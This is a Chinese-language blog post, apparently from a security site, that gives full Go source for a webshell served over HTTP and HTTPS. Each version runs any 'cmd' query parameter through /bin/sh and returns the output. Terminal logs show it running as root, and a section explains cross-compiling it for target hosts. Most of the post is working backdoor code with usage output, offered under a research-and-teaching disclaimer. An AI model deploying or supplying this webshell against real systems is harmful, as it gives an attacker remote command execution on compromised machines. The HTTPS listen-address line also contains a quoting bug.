0x00 前言
在这篇文章中,我将记录一下如何使用Golang实现一个webshell。
0x01 HTTP
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051 |
package mainimport ( "fmt" "log" "net/http" "os" "os/exec")var shell = "/bin/sh"var shellArg = "-c"func main() { if len(os.Args) != 2 { fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0]) fmt.Printf("Example: %s localhost:8080\n", os.Args[0]) os.Exit(1) } http.HandleFunc("/", requestHandler) log.Println("Listening for HTTP requests.") err := http.ListenAndServe(os.Args[1], nil) if err != nil { log.Fatal("Error creating server. ", err) }}func requestHandler(writer http.ResponseWriter, request *http.Request) { // Get command to execute from GET query parameters cmd := request.URL.Query().Get("cmd") if cmd == "" { fmt.Fprintln( writer, "No command provided. Example: /?cmd=whoami") return } log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd) fmt.Fprintf(writer, "You requested command: %s\n", cmd) // Run the command command := exec.Command(shell, shellArg, cmd) output, err := command.Output() if err != nil { fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error()) } // Write output of command to the response writer interface fmt.Fprintf(writer, "Output: \n%s\n", output)} |
123456789 |
ec2-user@kali:~/go/src/webshell$ go install webshellec2-user@kali:~/go/src/webshell$ ~/go/bin/webshell 0.0.0.0:802020/01/01 14:05:55 Listening for HTTP requests.2020/01/01 14:05:55 Error creating server. listen tcp 0.0.0.0:80: bind: permission deniedec2-user@kali:~/go/src/webshell$ sudo ~/go/bin/webshell 0.0.0.0:802020/01/01 14:06:00 Listening for HTTP requests.2020/01/01 14:06:04 Request from 54.222.196.177:61772: ifconfig^Cec2-user@kali:~/go/src/webshell$ |
0x02 HTTPS
注意把证书和私钥配上就可以走HTTPS了。
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556 |
package mainimport ( "fmt" "log" "net/http" "os" "os/exec")var shell = "/bin/sh"var shellArg = "-c"func main() { if len(os.Args) != 2 { fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0]) fmt.Printf("Example: %s localhost:8080\n", os.Args[0]) os.Exit(1) } http.HandleFunc("/", requestHandler) log.Println("Listening for HTTPS requests.") err := http.ListenAndServeTLS( "os.Args[1]", "cert.pem", "privateKey.pem", nil, ) if err != nil { log.Fatal("Error creating server. ", err) }}func requestHandler(writer http.ResponseWriter, request *http.Request) { // Get command to execute from GET query parameters cmd := request.URL.Query().Get("cmd") if cmd == "" { fmt.Fprintln( writer, "No command provided. Example: /?cmd=whoami") return } log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd) fmt.Fprintf(writer, "You requested command: %s\n", cmd) // Run the command command := exec.Command(shell, shellArg, cmd) output, err := command.Output() if err != nil { fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error()) } // Write output of command to the response writer interface fmt.Fprintf(writer, "Output: \n%s\n", output)} |
1234 |
ec2-user@kali:~/go/src/httpswebshell$ curl 127.0.0.1:443/?cmd=idYou requested command: idOutput:uid=0(root) gid=0(root) groups=0(root) |
0x03 使用方法(交叉编译)
需要针对目标主机的类型,将其编译为对应的可执行文件。本地测试命令:
12 |
sudo go run ~/go/src/httpswebshell/webshell.go 0.0.0.0:443go install httpswebshell # 编译 |
0x04 后记
记录一下使用Golang实现webshell,走HTTP(S)。
0x05 参考文献
[1] Security with Go
- source:tonghuaroot.com
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论